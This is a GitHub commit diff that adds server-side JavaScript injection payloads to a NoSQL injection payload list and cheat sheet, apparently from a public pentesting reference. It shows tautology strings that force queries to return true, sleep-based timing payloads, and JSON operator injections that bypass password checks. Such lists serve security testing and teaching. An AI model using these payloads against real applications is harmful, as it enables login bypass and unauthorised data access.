Merge pull request #499 from p3n7a90n/NosqliPayloads

Added basic SSJI paylods
This commit is contained in:
Swissky 2022-09-06 23:17:12 +02:00 committed by GitHub
commit 86e8feca7c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 16 additions and 0 deletions

View File

@ -20,3 +20,6 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
';sleep(5000);' ';sleep(5000);'
';sleep(5000);+' ';sleep(5000);+'
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
';return 'a'=='a' && ''=='
";return(true);var xyz='a
0;return true

View File

@ -19,6 +19,7 @@
* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap) * [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
* [nosqlilab - A lab for playing with NoSQL Injection](https://github.com/digininja/nosqlilab) * [nosqlilab - A lab for playing with NoSQL Injection](https://github.com/digininja/nosqlilab)
* [Burp-NoSQLiScanner - Plugin available in burpsuite](https://github.com/matrix/Burp-NoSQLiScanner)
## Exploit ## Exploit
@ -70,6 +71,14 @@ Extract data with "in"
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}} {"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
``` ```
### SSJI
```json
';return 'a'=='a' && ''=='
";return 'a'=='a' && ''=='
0;return true
```
## Blind NoSQL ## Blind NoSQL
@ -165,6 +174,9 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
'%20%26%26%20this.passwordzz.match(/.*/)//+%00 '%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''} {$gt: ''}
[$ne]=1 [$ne]=1
';return 'a'=='a' && ''=='
";return(true);var xyz='a
0;return true
``` ```
## References ## References
@ -173,3 +185,4 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
* [Testing for NoSQL injection - OWASP/WSTG](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection) * [Testing for NoSQL injection - OWASP/WSTG](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection)
* [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists) * [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists)
* [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb) * [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb)
* [Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java)